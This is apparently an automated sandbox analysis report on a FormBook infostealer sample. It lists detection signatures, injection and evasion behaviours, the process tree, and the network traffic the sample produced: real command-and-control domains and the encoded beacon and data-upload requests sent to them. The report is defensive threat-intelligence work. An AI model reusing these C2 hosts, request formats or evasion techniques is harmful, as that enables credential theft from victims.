Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fFoOcuxK7M.exe

Overview

General Information

Sample name:fFoOcuxK7M.exe
renamed because original name is a hash value
Original sample name:048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c.exe
Analysis ID:1588135
MD5:72fc342138f06b0dfd4c6bdd3edd676d
SHA1:dfd756902a23521df608df3f809d71971059970b
SHA256:048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fFoOcuxK7M.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\fFoOcuxK7M.exe" MD5: 72FC342138F06B0DFD4C6BDD3EDD676D)
    • svchost.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\fFoOcuxK7M.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TrOCMVbhcDRPP.exe (PID: 2360 cmdline: "C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 5376 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • TrOCMVbhcDRPP.exe (PID: 3524 cmdline: "C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1224 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious RASdial Activity
                Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe" , ParentImage: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe, ParentProcessId: 2360, ParentProcessName: TrOCMVbhcDRPP.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 5376, ProcessName: rasdial.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ParentImage: C:\Users\user\Desktop\fFoOcuxK7M.exe, ParentProcessId: 5392, ParentProcessName: fFoOcuxK7M.exe, ProcessCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ProcessId: 5740, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ParentImage: C:\Users\user\Desktop\fFoOcuxK7M.exe, ParentProcessId: 5392, ParentProcessName: fFoOcuxK7M.exe, ProcessCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ProcessId: 5740, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: fFoOcuxK7M.exeVirustotal: Detection: 60%Perma Link
                Source: fFoOcuxK7M.exeReversingLabs: Detection: 78%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: fFoOcuxK7M.exeJoe Sandbox ML: detected
                Source: fFoOcuxK7M.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrOCMVbhcDRPP.exe, 00000006.00000002.3381600573.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2521933157.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0012445A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012C6D1 FindFirstFileW,FindClose,0_2_0012C6D1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0012C75C
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0012EF95
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0012F0F2
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0012F3F3
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001237EF
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00123B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00123B12
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0012BCBC

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.egldfi.xyz
                Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001322EE
                Source: global trafficHTTP traffic detected: GET /vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.75178.clubUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bcg.servicesUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lgdiamonds.infoUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jalan2.onlineUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.75178.club
                Source: global trafficDNS traffic detected: DNS query: www.bcg.services
                Source: global trafficDNS traffic detected: DNS query: www.egldfi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.betmatchx.online
                Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.lgdiamonds.info
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: unknownHTTP traffic detected: POST /5onp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 209Host: www.bcg.servicesOrigin: http://www.bcg.servicesReferer: http://www.bcg.services/5onp/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 67 72 69 78 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4f 31 34 4b 78 56 48 47 34 50 34 43 72 36 6f 46 79 43 66 6c 76 71 4a 58 70 6b 37 2b 42 33 75 4a 56 6f 6a 55 56 54 2b 48 35 5a 78 Data Ascii: grix=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31O14KxVHG4P4Cr6oFyCflvqJXpk7+B3uJVojUVT+H5Zx
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:33 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
